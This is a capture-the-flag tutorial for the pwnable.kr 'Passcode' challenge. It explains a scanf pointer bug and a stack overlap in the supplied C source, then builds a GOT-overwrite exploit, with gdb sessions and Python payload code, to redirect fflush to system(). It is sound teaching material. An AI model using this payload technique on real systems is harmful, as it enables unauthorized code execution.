pwnable.kr (Passcode)
Tutorial Notes
What you’ll learn:
- More sophisticated attacks into memory buffers
- More sophisticated uses of gdb
- Introduction to assembly code
- Closer look at how data is stored in memory
Directions:
First visit pwnable.kr and click on the “Passcode” icon. Next we log in via ssh
as per the instructions:
$ ssh passcode@pwnable.kr -p2222
passcode@pwnable.kr's password:
____ __ __ ____ ____ ____ _ ___ __ _ ____
| \| |__| || \ / || \ | | / _] | |/ ]| \
| o ) | | || _ || o || o )| | / [_ | ' / | D )
| _/| | | || | || || || |___ | _] | \ | /
| | | ` ' || | || _ || O || || [_ __ | \| \
| | \ / | | || | || || || || || . || . \
|__| \_/\_/ |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
- Site admin : daehee87.kr@gmail.com
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
passcode@ubuntu:~$
Next let’s orient ourselves: who are we? what’s in our directory:
passcode@ubuntu:~$ id
uid=1010(passcode) gid=1010(passcode) groups=1010(passcode)
passcode@ubuntu:~$ ls -l
total 16
-r--r----- 1 root passcode_pwn 48 Jun 26 2014 flag
-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26 2014 passcode
-rw-r--r-- 1 root root 858 Jun 26 2014 passcode.c
Once again, the permissions on flag are such that only the owner (root) or group (passcode_pwn) can read it. We can also see an executable file, passcode, that has curious permissions:
-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26 2014 passcode
This looks similar to the suid (set user id on execute) permission from the Collision challenge, except the s is in the group field. This is the sgid or “set group id on execute” permission. When passcode is run, it takes on the group passcode_pwn. So if we run passcode, it will have the necessary privilege to read the flag. All we need to do now is figure out how to get it to read the flag.
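To double-check how that permission string is read, here is a small Python sketch. It is not part of the challenge, and it is written for Python 3 rather than the Python 2.7 interpreter found on the server. It builds the mode bits that correspond to -r-xr-sr-x by hand and asks the standard stat module whether the set-group-id bit is present. The helper name describe_mode is made up for illustration.

```python
import stat

def describe_mode(mode):
    """Return (permission string, setuid?, setgid?) for a raw st_mode value."""
    return (
        stat.filemode(mode),
        bool(mode & stat.S_ISUID),
        bool(mode & stat.S_ISGID),
    )

# Regular file, set-group-id bit, and r-x for user, group and other (octal 2555).
passcode_mode = stat.S_IFREG | stat.S_ISGID | 0o555

print(describe_mode(passcode_mode))
```

On a real file you would pass os.stat(path).st_mode to the helper instead of a hand-built value.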
Let’s have a look at the passcode.c
file:
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
Let’s start in the main() function. It calls two functions, welcome() and login(), and then prints a success message. Looking at welcome() doesn’t seem to reveal much: there’s simple code for you to enter your name and print it back. In login() we see a couple of places to enter a passcode, and then an if statement checking whether these passcodes equal some predetermined values. If so, the program will print the flag; otherwise the program will exit.
So what’s our strategy? Well, we could try to approach it the same as with the bof
challenge: overrun the bounds of the name
array in the welcome()
function, and see if we can use this to rewrite the passcode1
and passcode2
variables in the login()
function.
As before, it seems like it might be a good strategy to compile our own passcode
binary with debugging information present. First let’s check:
passcode@ubuntu:~$ file passcode
passcode: setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=d2b7bd64f70e46b1b0eb7036b35b24a651c3666b, not stripped
Again we see it’s a 32-bit binary. As before we can create and work out of a temp directory and compile our own version:
passcode@ubuntu:~$ mkdir /tmp/mypasscode && cp passcode.c /tmp/mypasscode && cd /tmp/mypasscode
passcode@ubuntu:/tmp/mypasscode$ gcc -g -m32 passcode.c -o passcode
passcode.c: In function ‘login’:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
scanf("%d", passcode1);
^
passcode.c:14:15: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
scanf("%d", passcode2);
^
passcode@ubuntu:/tmp/mypasscode$
Again we see compiler warnings. This could be useful. Let’s make a mental note and revisit this later.
Debugging passcode
Let’s start by running gdb and setting some breakpoints:
passcode@ubuntu:/tmp/mypasscode$ gdb passcode
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from passcode...done.
(gdb)
If we run list 0, gdb will print out the source code with corresponding line numbers. Let’s set up some breakpoints, shall we? First let’s set a breakpoint that lets us examine the contents of name after it has been written to (line 31), and a second one further along in login() (line 17):
(gdb) break 31
Breakpoint 1 at 0x804868d: file passcode.c, line 31.
(gdb) break 17
Breakpoint 2 at 0x8048608: file passcode.c, line 17.
Ok let’s run the program.
(gdb) run
Starting program: /tmp/mypasscode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890
Breakpoint 1, welcome () at passcode.c:31
31 printf("Welcome %s!\n", name);
(gdb) print name
$1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890\000\000\000\000\000`m\374\367(\334\377\377\340\336\376\367+`\347\367\000\000\000\000\000`\374\367\000`\374\367(\334\377\377"
Understanding how memory is laid out
Ok, so we can see the 100-character array partially filled with our input. But here’s a question: where is the name buffer stored in memory? Well, we can find out by printing the address of name as follows:
(gdb) print &name
$2 = (char (*)[100]) 0xffffdba8
Ok, so name
begins at address 0xffffdba8
and goes for 100 bytes. But here’s the next question: which direction does name
get written? Well let’s find out! First let’s print the contents of the memory address 0xffffdba8
. How should we do that? First, take a look at this article on examining memory addresses and data in gdb. We’ll use the x
command (i.e., “examine”) to print 100 characters starting at 0xffffdba8
:
(gdb) x/100c 0xffffdba8
0xffffdba8: 97 'a' 98 'b' 99 'c' 100 'd' 101 'e' 102 'f' 103 'g' 104 'h'
0xffffdbb0: 105 'i' 106 'j' 107 'k' 108 'l' 109 'm' 110 'n' 111 'o' 112 'p'
0xffffdbb8: 113 'q' 114 'r' 115 's' 116 't' 117 'u' 118 'v' 119 'w' 120 'x'
0xffffdbc0: 121 'y' 122 'z' 65 'A' 66 'B' 67 'C' 68 'D' 69 'E' 70 'F'
0xffffdbc8: 71 'G' 72 'H' 73 'I' 74 'J' 75 'K' 76 'L' 77 'M' 78 'N'
0xffffdbd0: 79 'O' 80 'P' 81 'Q' 82 'R' 83 'S' 84 'T' 85 'U' 86 'V'
0xffffdbd8: 87 'W' 88 'X' 89 'Y' 90 'Z' 48 '0' 49 '1' 50 '2' 51 '3'
0xffffdbe0: 52 '4' 53 '5' 54 '6' 55 '7' 56 '8' 57 '9' 48 '0' 0 '\000'
0xffffdbe8: 0 '\000' 0 '\000' 0 '\000' 0 '\000' 96 '`' 109 'm' -4 '\374' -9 '\367'
0xffffdbf0: 40 '(' -36 '\334' -1 '\377' -1 '\377' -32 '\340' -34 '\336' -2 '\376' -9 '\367'
0xffffdbf8: 43 '+' 96 '`' -25 '\347' -9 '\367' 0 '\000' 0 '\000' 0 '\000' 0 '\000'
0xffffdc00: 0 '\000' 96 '`' -4 '\374' -9 '\367' 0 '\000' 96 '`' -4 '\374' -9 '\367'
0xffffdc08: 40 '(' -36 '\334' -1 '\377' -1 '\377'
So from this we can see that the name
buffer grows upward in memory, i.e., each successive byte is stored at the next larger memory address. This means that if name[0]
is stored in address 0xffffdba8
, then name[99]
is stored in address 0xffffdba8
+ 99 = 0xffffdc0b
.
If you’d like to do arithmetic in hexadecimal, you can do it easily with Python:
passcode@ubuntu:/tmp/mypasscode$ python
Python 2.7.12 (default, Jul 1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> x = int("ffffdba8",16) + 99
>>> print hex(x)
0xffffdc0b
So now we have a clear picture how name[]
is laid out in memory:
Memory address Contents Write Direction
-------------- -------- ---------------
... ...
0xffffdc0d <something else>
0xffffdc0c <something else> (High)
0xffffdc0b name[99] ^
0xffffdc0a name[98] / \
0xffffdc09 name[97] |
0xffffdc08 name[96] |
... ... |
0xffffdbab name[3] |
0xffffdbaa name[2] |
0xffffdba9 name[1] |
0xffffdba8 name[0] |
0xffffdba7 <something else> (Low)
0xffffdba6 <something else>
... ...
If you’d like a little memory aid to help you remember, think of the word “writeup.” That is, data is written upwards in memory.
Storing Integers as Little Endian
Character arrays are stored in memory in a straightforward way: each successive character occupies the next higher memory address. But what about integers? The 32-bit x86 architecture that the passcode program is built for is little endian, meaning the “little end” (i.e., low byte) of the integer gets stored first.
Here’s an illustration of “big end” vs. “little end.”
Decimal 305419896 is hex 0x12345678
Represented as bytes:
The "big end" The "little end"
^ ^
| |
0x12, 0x34, 0x56, 0x78
If an architecture is little endian, the little end gets stored first, which means:
Little endian means little end gets stored first:
0x12, 0x34, 0x56, 0x78
^ ^ ^ ^
| | | | This byte stored 1st
| | | This byte stored 2nd
| | This byte stored 3rd
| This byte stored 4th
The data is still written in an upward direction (i.e., in successively larger addresses). So the first byte gets stored at address n, the second byte is stored at the next higher address n+1, and so on.
We can try this out. Let’s load the integer 0x12345678
into memory starting at address 0xffffdba8
:
(gdb) set {int}0xffffdba8 = 0x12345678
Now let’s examine the memory:
(gdb) x/x 0xffffdba8
0xffffdba8: 0x78
(gdb) x/x 0xffffdba9
0xffffdba9: 0x56
(gdb) x/x 0xffffdbaa
0xffffdbaa: 0x34
(gdb) x/x 0xffffdbab
0xffffdbab: 0x12
So just to visualize this a bit better, the integer 0x12345678
gets stored in memory like this:
Memory address Contents
-------------- --------
... ...
0xffffdbac <something else>
0xffffdbab 0x12
0xffffdbaa 0x34
0xffffdba9 0x56
0xffffdba8 0x78
0xffffdba7 <something else>
... ...
So what? Well, recall that when we’re writing bytes into a buffer, we’re writing from low to high. So if we wanted to write the integer 0x12345678 into memory we’d need to take the little endian-ness into account and order the byte array accordingly:
0x78, 0x56, 0x34, 0x12
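The same byte ordering can be reproduced outside gdb with Python’s standard struct module. This is only a sketch for checking your understanding, written for Python 3 (under Python 2 the byte iteration below behaves differently). The big endian line is there purely for contrast.

```python
import struct

value = 0x12345678

# "<I" means: little endian, unsigned 32-bit integer.
little = struct.pack("<I", value)
# ">I" is the big endian layout, shown only for contrast.
big = struct.pack(">I", value)

# Bytes are listed in the order they sit in memory, lowest address first.
print([hex(b) for b in little])
print([hex(b) for b in big])
```

The first list is the order in which we would have to feed the bytes into a buffer that is written from low addresses to high ones.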
Debugging the login()
function
Let’s set a new break point in the login()
function to see where the passcode1
and passcode2
variables are stored in memory. We can set a breakpoint right at the start of the login()
function and then check their memory addresses:
(gdb) break 8
Breakpoint 1 at 0x80485a1: file passcode.c, line 8.
(gdb) run
Starting program: /tmp/mypasscode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : abc123
Welcome abc123!
Breakpoint 1, login () at passcode.c:8
8 printf("enter passcode1 : ");
(gdb) print &passcode1
$1 = (int *) 0xffffdc08
(gdb) print &passcode2
$2 = (int *) 0xffffdc0c
(gdb)
Well this is interesting. Notice passcode1
begins at 0xffffdc08
. Since it’s an integer, it occupies 4 bytes growing upward in memory, i.e.,
Memory address Contents
-------------- -------
0xffffdc0b passcode1 (most significant byte)
0xffffdc0a passcode1
0xffffdc09 passcode1
0xffffdc08 passcode1 (least significant byte)
But now recall back to our analysis of the name
buffer in the welcome()
function:
Memory address Contents
-------------- -------
0xffffdc0b name[99]
0xffffdc0a name[98]
0xffffdc09 name[97]
0xffffdc08 name[96]
Interesting! The last 4 bytes of name
overlap with passcode1
.
Huh? How does that work? Well name
and passcode1
are local variables living in two separate functions. Local variables are only allocated when the function is called. So by the time passcode1
is allocated, the name
variable is no longer being used, and passcode1
essentially by coincidence got allocated to a region of memory that name
had used previously.
So here’s another question: if we set the addresses 0xffffdc08-0b
during the welcome()
function, would those values still be there when the login
function is called? Well let’s check. Let’s try entering a name consisting of 96 “.”s followed by “ABCD”. Then we’ll examine the contents of passcode1
using x/c
, which tells gdb to print the memory contents as characters:
(gdb) run
Starting program: /tmp/mypasscode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : ................................................................................................ABCD
Welcome ................................................................................................ABCD!
Breakpoint 2, login () at passcode.c:8
8 printf("enter passcode1 : ");
(gdb) x/c 0xffffdc08
0xffffdc08: 65 'A'
(gdb) x/c 0xffffdc09
0xffffdc09: 66 'B'
(gdb) x/c 0xffffdc0a
0xffffdc0a: 67 'C'
(gdb) x/c 0xffffdc0b
0xffffdc0b: 68 'D'
(gdb)
Bingo! We can control the contents of passcode1
at the time the login()
function is called.
The mistake here (well, one of the mistakes) is the programmer didn’t initialize passcode1
, so whatever was living in memory from before just gets left there. Ok, this will be useful.
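The overlap can also be worked out on paper. The sketch below (Python 3) takes the two addresses printed by gdb for the self-compiled binary, computes how far into name the first byte of passcode1 falls, and then replays the “96 dots plus ABCD” experiment on a toy bytearray standing in for the stack. The addresses are specific to this build and debugging session; a different binary or environment may well give different values.

```python
import struct

NAME_ADDR = 0xffffdba8       # &name, from the gdb session above
PASSCODE1_ADDR = 0xffffdc08  # &passcode1, from the gdb session above

# Index into name[] at which passcode1's first byte will later live.
offset = PASSCODE1_ADDR - NAME_ADDR

# Toy stand-in for the 100 bytes of stack that name occupied.
stack = bytearray(100)
user_input = b"." * offset + b"ABCD"
stack[:len(user_input)] = user_input

# What login() would find in the uninitialized passcode1 (little endian read).
leftover = struct.unpack_from("<I", stack, offset)[0]

print(offset, hex(leftover))
```

Note how 'A' (0x41), the first of the four bytes typed, ends up as the low byte of the integer.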
That Compiler Warning about scanf()
Recall that when we compiled the program, we received this compiler warning:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
scanf("%d", passcode1);
Let’s go look up what’s going on here. The scanf()
function is accepting input from standard in. To understand this, you need to understand a bit about how pointers work.
First let’s see an example of how scanf
reads an integer from standard in:
scanf ("%d", <address>)
The scanf
tells the program to read bytes from standard input, interpret them in some specified format, and then store them somewhere in memory.
The %d
tells the program to interpret the input as a signed integer, i.e., read an ASCII numeric value from standard in, interpret it as a 4 byte integer, and store it at the address specified by <address>
.
Using scanf
properly
So how do you specify an address? Well first we would allocate an integer in memory, and then point scanf
to that location. Here’s an example of how to do it properly:
int i;
printf ("Enter your age: ");
scanf ("%d", &i);
The &i tells the program to look up the memory address of integer i using the address-of operator &, and then write the resulting 4-byte integer to memory beginning at that address.
Using scanf
improperly
Look what happens in login()
, however:
printf("enter passcode1 : ");
scanf("%d", passcode1);
The programmer has made a mistake. Recall scanf()
will write the input to whatever address you give it. The correct action would be to lookup the address of passcode1
using &passcode1
, i.e.,
scanf("%d", &passcode1);
But the programmer forgot the address-of
operator. So instead of giving scanf
the location of passcode1
, you’re giving it the contents of passcode1
!
But scanf
is a dumb function… it’s going to write to whatever address you give it, so it’s going to treat the contents of passcode1
as the address to write to!
So as the attacker, if we could set the content of passcode1
, we could make the program write an integer anywhere we want!
In summary
So to summarize what we have so far:
- The name buffer overlaps with passcode1, allowing us to write into passcode1
- The programmer forgot to initialize passcode1, allowing us to control the contents of passcode1
- The programmer improperly instructs scanf to store the integer read from standard input at the address given by the contents of passcode1
Since we control the contents of passcode1, we can write an integer into any memory location we want (well.. with some constraints).
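To make the difference between the two scanf calls concrete, here is a toy model in Python 3. It is not how scanf is implemented; the dictionary memory and the helpers scanf_d and read_int are invented for illustration and only mimic “parse a decimal number and store it as 4 little endian bytes at the given address”. The leftover value 0x44434241 is what the “ABCD” experiment above leaves in passcode1.

```python
import struct

memory = {}  # toy address space: address -> byte value

def scanf_d(address, typed_text):
    """Mimic scanf("%d", address): parse decimal text, store 4 bytes at address."""
    raw = struct.pack("<i", int(typed_text))
    for i, byte in enumerate(raw):
        memory[address + i] = byte

def read_int(address):
    """Read a little endian signed 32-bit integer back out of the toy memory."""
    raw = bytes(memory[address + i] for i in range(4))
    return struct.unpack("<i", raw)[0]

PASSCODE1_ADDR = 0xffffdc08  # &passcode1, from the gdb session
LEFTOVER = 0x44434241        # contents of passcode1 after typing ...ABCD as the name

# What the programmer meant, scanf("%d", &passcode1):
scanf_d(PASSCODE1_ADDR, "338150")

# What the program does, scanf("%d", passcode1): the stale contents are the target.
scanf_d(LEFTOVER, "338150")

print(hex(PASSCODE1_ADDR), read_int(PASSCODE1_ADDR))
print(hex(LEFTOVER), read_int(LEFTOVER))
```

In the buggy case the number lands at whatever address the attacker left behind in passcode1, which is exactly the primitive the rest of the exploit relies on.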
Hijacking a function call
Question: if you could write 4 bytes anywhere in memory, where would you write? What would you write? Well recall 4 bytes is enough to specify a memory address. So the “what” could be an address.
The next piece of the puzzle is to understand what happens when a function gets called. There’s a fair bit of detail here, but we’ll just skip to the part that’s relevant to us: when a function is called, the program has to jump to a location in memory containing the function’s code. That means a function call must specify an address to jump to. So if we could overwrite that address, we could cause the program to jump to anywhere we want and continue executing!
So what if we just jumped straight to the system() call, bypassing the if statement altogether? Let’s take a look.
For this we can use the disassemble command in gdb to disassemble the login function and see which memory addresses are associated with the various operations:
(gdb) disassemble login
Dump of assembler code for function login:
0x0804859b <+0>: push %ebp
.
.
.
0x0804862d <+146>: push $0x80487bf
0x08048632 <+151>: call 0x8048450 <system@plt>
.
.
.
So if we could somehow cause the program to jump to address 0x0804862d
, the next instruction to be executed would be the system call that would print the flag!
So which function call shall we hijack? Returning to the code, the operation immediately after the scanf
is a function called fflush
:
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
So we could use the scanf to overwrite the address pointing to the start of the fflush code, causing the program to jump to the system call instead. Let’s disassemble fflush and see. Note that the program should not be running (i.e., not merely paused at a breakpoint) when you do this:
(gdb) disassemble fflush
Dump of assembler code for function fflush@plt:
0x08048420 <+0>: jmp *0x804a010
0x08048426 <+6>: push $0x8
0x0804842b <+11>: jmp 0x8048400
End of assembler dump.
So the first instruction is jmp *0x804a010
. The jmp
instruction tells the program to jump to an address to continue execution. In this case the program will jump to the location of the fflush
code and execute it.
So which address does it jump to? The “*” is the indirection operator: *0x804a010 means “the address stored at 0x804a010”. In other words, go grab the 4 bytes stored in memory at addresses 0x804a010-0x804a013, and then jump to the address they hold.
Ok, now we got it. We need to overwrite the contents in addresses 0x804a010-0x804a013
with the address of the system call. When the program loads the address to run the fflush
code, it will instead load the address of the system call, and jump to that instead.
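Recall the system call sequence starts at address 0x0804862d (the push of its argument), so our goal is to write the following contents to memory. Because the integer is stored little endian, the low byte 0x2d goes at the lowest address:
Memory address Contents
-------------- -------
0x804a013 0x08
0x804a012 0x04
0x804a011 0x86
0x804a010 0x2d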
In Summary
When the program calls fflush
, it goes and grabs the 4 bytes starting at 0x804a010
. Normally this would cause the program to jump to the location of the fflush
instructions. But we’ve rewritten the memory contents to the address of the system call. So when the program tries to jump to the fflush
instructions, it will jump to the system call instead, which will print the flag.
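The byte layout that results from storing 0x0804862d at 0x804a010 can be checked with a few lines of Python 3. Both addresses come from the disassembly of the self-compiled binary above, so treat them as values for that build only.

```python
import struct

GOT_FFLUSH = 0x0804a010   # slot read by "jmp *0x804a010" (self-compiled binary)
TARGET = 0x0804862d       # the push just before "call system@plt"

# scanf("%d") stores the value as a 4-byte little endian integer.
raw = struct.pack("<I", TARGET)

# Address -> byte that ends up there after the overwrite.
layout = {GOT_FFLUSH + i: byte for i, byte in enumerate(raw)}

# Print highest address first, matching the tables in this tutorial.
for address in sorted(layout, reverse=True):
    print(hex(address), hex(layout[address]))
```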
Putting it all together
In summary we have 3 parts to our exploit:
- Filling the buffer enough to write into passcode1
- Filling passcode1 with the value 0x804a010 so scanf will store input to that address
- Filling address 0x804a010 with the address 0x0804862d so that the fflush call will jump to the system call, printing the flag.
So as input into the program we need:
- 96 characters of filler (the content doesn’t matter), just enough bytes so we can set the last 4 bytes. Python makes it easy to generate a string of 96 characters:
96 * '.'
- The address into which we will store the address to be jumped to, i.e., the bytes 0x08, 0x04, 0xa0, 0x10 in little endian order. In Python this would be:
\x10\xa0\x04\x08
- The address to jump to, i.e. 0x0804862d. This value, however, must be delivered as an ASCII-encoded decimal number, since the scanf() function is expecting the user to type it in. Let’s convert 0x0804862d to decimal. Using the Python interpreter we get:
>>> int("0804862d",16)
134514221
Putting this all together we have the Python command:
print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'
Ok, let’s input this into passcode
:
passcode@ubuntu:/tmp/mypasscode$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
/bin/cat: flag: No such file or directory
enter passcode1 : Now I can safely trust you that you have credential :)
It worked! But it didn’t print the flag (it says No such file or directory
). That’s because we ran it on the version in /tmp/mypasscode
. Now we need to run it on the real version in /home/passcode
:
passcode@ubuntu:~$ cd /home/passcode
passcode@ubuntu:~$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
enter passcode1 : enter passcode2 : checking...
Login Failed!
Hmm. This time it didn’t work. The specific memory addresses for the fflush
call and the system
call must be different.
GOAL: Your job is to disassemble the real passcode
file and figure out what the correct addresses are, and then capture the flag!
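Once you have new addresses, it helps to regenerate the input rather than edit the one-liner by hand. The following is a minimal sketch in Python 3, not the tutorial’s original Python 2 command. The function name build_payload and its parameters are invented here, the default filler length of 96 comes from the self-compiled binary and is an assumption for any other build, and the two addresses in the example call are the ones from the local build, not the real target.

```python
import struct

def build_payload(got_slot, target, filler_len=96):
    """Return the bytes to feed to passcode's standard input.

    got_slot   -- address of the slot to overwrite (ends up in passcode1)
    target     -- address execution should jump to instead
    filler_len -- bytes of name[] that precede passcode1 (96 in the local build)
    """
    packed = struct.pack("<I", got_slot)
    # scanf("%100s") stops at whitespace, so such bytes cannot be part of the name.
    if any(byte in b" \t\n\v\f\r" for byte in packed):
        raise ValueError("address contains a whitespace byte")
    name = b"." * filler_len + packed
    # scanf("%d") wants the number typed out as ASCII decimal digits.
    number = str(target).encode("ascii")
    return name + number + b"\n"

# Values from the self-compiled binary; replace them for the real target.
payload = build_payload(0x0804a010, 0x0804862d)
print(len(payload), payload[-14:])
```

To pipe the raw bytes into the program from a script, one option is to write them with sys.stdout.buffer.write(payload) instead of print, since print would show the Python representation rather than the bytes themselves.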